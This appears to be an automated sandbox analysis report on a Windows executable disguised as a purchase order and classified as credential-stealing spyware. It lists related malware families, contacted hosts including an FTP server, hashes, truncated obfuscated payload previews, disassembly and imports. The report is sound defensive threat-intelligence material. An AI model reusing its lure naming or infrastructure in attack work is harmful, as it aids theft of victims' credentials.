                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:[Purchase Order] PO2411024.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@3/4@2/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 96%
                              • Number of executed functions: 64
                              • Number of non-executed functions: 295
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                              • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: [Purchase Order] PO2411024.exe
                              TimeTypeDescription
                              07:05:46API Interceptor10427920x Sleep call for process: RegSvcs.exe modified
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              208.95.112.1Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                              • ip-api.com/line/?fields=hosting
                              file.exeGet hashmaliciousClipboard HijackerBrowse
                              • ip-api.com/line/
                              XSLHv0kxy7.exeGet hashmaliciousXWormBrowse
                              • ip-api.com/line/?fields=hosting
                              oaUNY8P657.exeGet hashmaliciousXWormBrowse
                              • ip-api.com/line/?fields=hosting
                              IAdjMfB2A5.exeGet hashmaliciousXWormBrowse
                              • ip-api.com/line/?fields=hosting
                              dkKMw0OlZ9.exeGet hashmaliciousXWormBrowse
                              • ip-api.com/line/?fields=hosting
                              EternalPredictor.exeGet hashmaliciousBlank Grabber, Skuld Stealer, XWormBrowse
                              • ip-api.com/json/?fields=225545
                              program.exeGet hashmaliciousBlank GrabberBrowse
                              • ip-api.com/json/?fields=225545
                              skuld.exeGet hashmaliciousSkuld StealerBrowse
                              • ip-api.com/line/?fields=hosting
                              SolaraBostrappers.exeGet hashmaliciousDCRatBrowse
                              • ip-api.com/line/?fields=hosting
                              195.252.110.253INV & BANK DETAILS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                PO#150003191.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  dg4Bwri6Cy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    DHOYXfCAeB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      RgAm3scap8.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        EgjKf0gmd1.exeGet hashmaliciousAgentTeslaBrowse
                                          INVOICE SUBMISSION.exeGet hashmaliciousAgentTeslaBrowse
                                            KM75Avr7PS.exeGet hashmaliciousAgentTeslaBrowse
                                              Bm3Ux1o05M.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                25QpgTIExG.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  ip-api.comWire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  file.exeGet hashmaliciousClipboard HijackerBrowse
                                                  • 208.95.112.1
                                                  XSLHv0kxy7.exeGet hashmaliciousXWormBrowse
                                                  • 208.95.112.1
                                                  oaUNY8P657.exeGet hashmaliciousXWormBrowse
                                                  • 208.95.112.1
                                                  IAdjMfB2A5.exeGet hashmaliciousXWormBrowse
                                                  • 208.95.112.1
                                                  dkKMw0OlZ9.exeGet hashmaliciousXWormBrowse
                                                  • 208.95.112.1
                                                  EternalPredictor.exeGet hashmaliciousBlank Grabber, Skuld Stealer, XWormBrowse
                                                  • 208.95.112.1
                                                  program.exeGet hashmaliciousBlank GrabberBrowse
                                                  • 208.95.112.1
                                                  skuld.exeGet hashmaliciousSkuld StealerBrowse
                                                  • 208.95.112.1
                                                  SolaraBostrappers.exeGet hashmaliciousDCRatBrowse
                                                  • 208.95.112.1
                                                  ftp.jeepcommerce.rsINV & BANK DETAILS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 195.252.110.253
                                                  PO#150003191.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 195.252.110.253
                                                  dg4Bwri6Cy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 195.252.110.253
                                                  DHOYXfCAeB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 195.252.110.253
                                                  RgAm3scap8.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 195.252.110.253
                                                  EgjKf0gmd1.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 195.252.110.253
                                                  INVOICE SUBMISSION.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 195.252.110.253
                                                  KM75Avr7PS.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 195.252.110.253
                                                  Bm3Ux1o05M.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 195.252.110.253
                                                  25QpgTIExG.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 195.252.110.253
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  TUT-ASUSWire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  file.exeGet hashmaliciousClipboard HijackerBrowse
                                                  • 208.95.112.1
                                                  XSLHv0kxy7.exeGet hashmaliciousXWormBrowse
                                                  • 208.95.112.1
                                                  oaUNY8P657.exeGet hashmaliciousXWormBrowse
                                                  • 208.95.112.1
                                                  IAdjMfB2A5.exeGet hashmaliciousXWormBrowse
                                                  • 208.95.112.1
                                                  dkKMw0OlZ9.exeGet hashmaliciousXWormBrowse
                                                  • 208.95.112.1
                                                  EternalPredictor.exeGet hashmaliciousBlank Grabber, Skuld Stealer, XWormBrowse
                                                  • 208.95.112.1
                                                  program.exeGet hashmaliciousBlank GrabberBrowse
                                                  • 208.95.112.1
                                                  skuld.exeGet hashmaliciousSkuld StealerBrowse
                                                  • 208.95.112.1
                                                  SolaraBostrappers.exeGet hashmaliciousDCRatBrowse
                                                  • 208.95.112.1
                                                  BEOTEL-AShttpwwwbeotelnetRSINV & BANK DETAILS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 195.252.110.253
                                                  PO#150003191.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 195.252.110.253
                                                  dg4Bwri6Cy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 195.252.110.253
                                                  DHOYXfCAeB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 195.252.110.253
                                                  RgAm3scap8.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 195.252.110.253
                                                  belks.mips.elfGet hashmaliciousMiraiBrowse
                                                  • 62.108.98.183
                                                  belks.mpsl.elfGet hashmaliciousMiraiBrowse
                                                  • 62.108.98.157
                                                  belks.sh4.elfGet hashmaliciousMiraiBrowse
                                                  • 62.108.98.156
                                                  splsh4.elfGet hashmaliciousUnknownBrowse
                                                  • 217.26.70.40
                                                  atH4SE3Oi6.elfGet hashmaliciousMiraiBrowse
                                                  • 62.108.98.149
                                                  No context
                                                  No context
                                                  Process:C:\Users\user\Desktop\[Purchase Order] PO2411024.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):269824
                                                  Entropy (8bit):7.880715888856166
                                                  Encrypted:false
                                                  SSDEEP:6144:nZzglYOYjVua5YsyzrKbXiAtyTSm7qPTHM:ZzglYya5TaKTztye8qPDM
                                                  MD5:C6ECC83DC05128F90FD21CCFF8E1051E
                                                  SHA1:76882218313A49BD41B8BBFBA863E5F6915DAB79
                                                  SHA-256:991EE9900C3F80633C53F46199C2AFCF754F355CD56F02705B5AB171937CA19C
                                                  SHA-512:3553208D5FC6AFB13C547A617B7305015587C7A0C34256138F8EBE7E4382184C28326FEF080764E799138BA85D7EB3E19EFCFAC57B69A1D6116733661C7FD877
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:...7M9422O1C..T7.9426O1C.LT7N9426O1CPLT7N9426O1CPLT7N9426O1C.LT7@&.<6.8.q.U{..`Z_<.3"#3E/T.QW!_,$l6RnKA\.&_c....#VPW.B<ItLT7N942^_.n|=.IbH.L.>.=bo+IqH.L=..={=.IbH.Lj>.=bo:IRH.L.lX=.=.I|.OL.>.=.%7_bH.L6O1CPLT7N9426O1C.d.RN942f.1C.MP7:.4b6O1CPLT7.9.3=N8CP.U7N.626O1C..T7N)426.0CPL.7N)426M1CULT7N9423O1CPLT7NY026K1C.wV7L94.6O!CP\T7N9$26_1CPLT7^9426O1CPLT7.,62fO1CP,V7..526O1CPLT7N9426O1CPLT7N942..0CLLT7N9426O1CPLT7N9426O1CPLT7.462vO1CPLT7N9426.0C.MT7N9426O1CPLT7N9426O1CPLT7`MQJBO1CH.U7N)426.0CPHT7N9426O1CPLT7n94R.=U"$-T7.T426.0CP"T7N.526O1CPLT7N942vO1.~(5C/942..1CPlV7N/426E3CPLT7N9426O1C.LT.`KG@UO1C.U7NY626.0CPlV7N9426O1CPLT7.94r6O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7N9426O1CPLT7
                                                  Process:C:\Users\user\Desktop\[Purchase Order] PO2411024.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):263652
                                                  Entropy (8bit):7.974598242364538
                                                  Encrypted:false
                                                  SSDEEP:6144:3p6qrpuuUWk6OAElLl5i0PE5AtTN1pAB+ZD4r:3Mqrpu4iAElZ5dEoTzO8ZD4r
                                                  MD5:FC794FC8C4E3FEFEF0899FF0E432B339
                                                  SHA1:54D4625BDC0100A6DA5FF82C1DD2359FD187E1B0
                                                  SHA-256:6AF3F2ACCDA7878D85DB571A8D10EBDAC4A3FFEA04B45BEF77BB8713C4CA7861
                                                  SHA-512:EC6A683F58E5752DEDCBBBCAA1CADFC9CA39F5EABFFC35D847759953CF83F1C8CCE4EC9846B2A3A4787E6EB332F5546894E717D149AE6DE04E15B0B9B7AC5248
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:EA06.......zl.i2.S.4=~.7....`..!L.M.......}[...&.O&..:.....q..j.<...R9.._T.Tj....Il.T...r-&...8<^GV.U..).&......kn.Ow..#.L.O.s...WI......{{.....P..:....%..=......>.... RY.|.......M%H.1.B.48.6.7.g&. .Mk.1y...8..:.Y.;w6.0.....R.x.....P.3...........3...1....i.2s4.M....B..H.&Sj..&+.%..K&.+0.c,.M.\Y......L(t..O..4.L......:......M..@..#.U...\.`...|6......dRIh.AT......T| ....(........`.U...x..E..<|.F...K..*...3`..V@W.........Nf. %...3..A..b.h..cD.n..t..X.s:4Z.n.7.T..Mjc..3.......`.....1...&.+.?i..Q.<...i?.S..8.......1.\&w....>.` .......g?...-i....l..B..5.8......>..._L.m.....m..o".?...6.|.....L.S.7.....@...,...L~..u.... .I.7....24..v.L..>......P.ts....D......... .(.s..S.t;.z..._b.)...Z(..n..2.T.B....e.`..+~.y_.r&....e9.....~.m..M&[i.....U.9......g.....9.}.V...SI..0=...3..k..v...L&.*%.mw.P..+.Z]....t.!c..S......$.S&\..#.....:.~w..Jw.8.&.5.Nv...:cC....:....[..._.B..&@0...g...g.B..,........jq>n.. R..M."....!..DZE@......M.E..O...S.M.....k......#5.L......
                                                  Process:C:\Users\user\Desktop\[Purchase Order] PO2411024.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):14410
                                                  Entropy (8bit):7.646510905155534
                                                  Encrypted:false
                                                  SSDEEP:384:nTYzREtNmuENkIa5d0mUa/UDg6Ny87NokGTSBHPCQW3O:nAaNmuEyL0SsDg6N5vHPCQW3O
                                                  MD5:4C39480D3D1568E3CC7CCB3F8CB6FABA
                                                  SHA1:B0EE9632C35CDDFEEACE54A66B67718FFA492A90
                                                  SHA-256:A419801940E87AB2817D47CA6EC83ED3EC5B8C922D1C14DF1EB45FB755198130
                                                  SHA-512:601339A75926E6FA7025861B54A1E0D6B6E192B02AC8FC958EF44D914F52964387168B1B515731B3529EC43CA9C8275BC6B0C2969DA2EA56CACD634F817ECA09
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:EA06..0..[-w9..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                                  Process:C:\Users\user\Desktop\[Purchase Order] PO2411024.exe
                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):143378
                                                  Entropy (8bit):2.9923851243162467
                                                  Encrypted:false
                                                  SSDEEP:1536:lC6Hbc8ZnkCXWqb6+Mic49+Vot6Jb0J63g1U:1WWjtg
                                                  MD5:B40544BCDE92DB4EBF377847D2154842
                                                  SHA1:847A95AFBAA2B98EB5F2A32CF171BAA1C204036A
                                                  SHA-256:B7EA4DD59F92A21895F9E9075F84646CB40EBCAC60E341E6FBFF73836B3162C1
                                                  SHA-512:4693FCBBA67FDBE18B0D7E60959EB4D67E828A480F7EFB060E1D8BB586FE79C31979D4141A0D1B03736AB4DB292FD6CDC018D629EC7B63E101463F54D5EE704F
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:dlks0dlksxdlks5dlks5dlks8dlksbdlksedlkscdlks8dlks1dlksedlkscdlkscdlkscdlks0dlks2dlks0dlks0dlks0dlks0dlks5dlks6dlks5dlks7dlksbdlks8dlks6dlksbdlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks4dlks5dlks8dlks4dlksbdlks9dlks6dlks5dlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks4dlksddlks8dlks6dlksbdlksadlks7dlks2dlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks5dlks5dlks8dlks8dlksbdlks8dlks6dlksedlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks4dlks5dlks8dlksadlksbdlks9dlks6dlks5dlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks4dlksddlks8dlkscdlksbdlksadlks6dlkscdlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks5dlks5dlks8dlksedlksbdlks8dlks3dlks3dlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks4dlks5dlks9dlks0dlksbdlks9dlks3dlks2dlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks4dlksddlks9dlks2dlksbdlksadlks2dlksedlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks5dlks5dlks9dlks4dlksbdlks8dlks6dlks4dlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.188145811464378
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:[Purchase Order] PO2411024.exe
                                                  File size:947'171 bytes
                                                  MD5:e3d9142bc972b5c18cf65055d754730e
                                                  SHA1:9a901d247c4d70d427bc2361aa7ecf187754aaed
                                                  SHA256:fc62e1f8a06c83ac2f02300784042f52a8f071466843f9946724ff6f99ebc096
                                                  SHA512:d4e5611347aafcc2b2ce1a9101f3c60ea1b4f839014fcdeea08aa3fe48291e48eacfa274514622477340a0f1722dfde00e17fabd3970dc305dc55d7163f9fb81
                                                  SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCWKqSJfB480u10tc2n:7JZoQrbTFZY1iaCWopUu12n
                                                  TLSH:5E15D022F5D58036C2B323B19E7EF76A963D79360326D29B27C82D315EA05412B39773
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                  Icon Hash:1733312925935517
                                                  Entrypoint:0x4165c1
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:0
                                                  File Version Major:5
                                                  File Version Minor:0
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:0
                                                  Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                  Instruction
                                                  call 00007F86B8D7DE6Bh
                                                  jmp 00007F86B8D74CDEh
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push ebp
                                                  mov ebp, esp
                                                  push edi
                                                  push esi
                                                  mov esi, dword ptr [ebp+0Ch]
                                                  mov ecx, dword ptr [ebp+10h]
                                                  mov edi, dword ptr [ebp+08h]
                                                  mov eax, ecx
                                                  mov edx, ecx
                                                  add eax, esi
                                                  cmp edi, esi
                                                  jbe 00007F86B8D74E5Ah
                                                  cmp edi, eax
                                                  jc 00007F86B8D74FF6h
                                                  cmp ecx, 00000080h
                                                  jc 00007F86B8D74E6Eh
                                                  cmp dword ptr [004A9724h], 00000000h
                                                  je 00007F86B8D74E65h
                                                  push edi
                                                  push esi
                                                  and edi, 0Fh
                                                  and esi, 0Fh
                                                  cmp edi, esi
                                                  pop esi
                                                  pop edi
                                                  jne 00007F86B8D74E57h
                                                  jmp 00007F86B8D75232h
                                                  test edi, 00000003h
                                                  jne 00007F86B8D74E66h
                                                  shr ecx, 02h
                                                  and edx, 03h
                                                  cmp ecx, 08h
                                                  jc 00007F86B8D74E7Bh
                                                  rep movsd
                                                  jmp dword ptr [00416740h+edx*4]
                                                  mov eax, edi
                                                  mov edx, 00000003h
                                                  sub ecx, 04h
                                                  jc 00007F86B8D74E5Eh
                                                  and eax, 03h
                                                  add ecx, eax
                                                  jmp dword ptr [00416654h+eax*4]
                                                  jmp dword ptr [00416750h+ecx*4]
                                                  nop
                                                  jmp dword ptr [004166D4h+ecx*4]
                                                  nop
                                                  inc cx
                                                  add byte ptr [eax-4BFFBE9Ah], dl
                                                  inc cx
                                                  add byte ptr [ebx], ah
                                                  ror dword ptr [edx-75F877FAh], 1
                                                  inc esi
                                                  add dword ptr [eax+468A0147h], ecx
                                                  add al, cl
                                                  jmp 00007F86BB1ED657h
                                                  add esi, 03h
                                                  add edi, 03h
                                                  cmp ecx, 08h
                                                  jc 00007F86B8D74E1Eh
                                                  rep movsd
                                                  jmp dword ptr [00000000h+edx*4]
                                                  Programming Language:
                                                  • [ C ] VS2010 SP1 build 40219
                                                  • [C++] VS2010 SP1 build 40219
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [ASM] VS2010 SP1 build 40219
                                                  • [RES] VS2010 SP1 build 40219
                                                  • [LNK] VS2010 SP1 build 40219
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                  RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                  RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                  RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                  RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                  RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                  RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                  RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                  RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                  RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                  RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                  RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                  RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                  RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                  RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                  RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                  RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                  RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                  RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                  RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                  RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                  RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                  RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                  RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                  RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                  RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                  RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                                  DLLImport
                                                  WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                  VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                  COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                  MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                  WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                  PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                  USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                  KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, 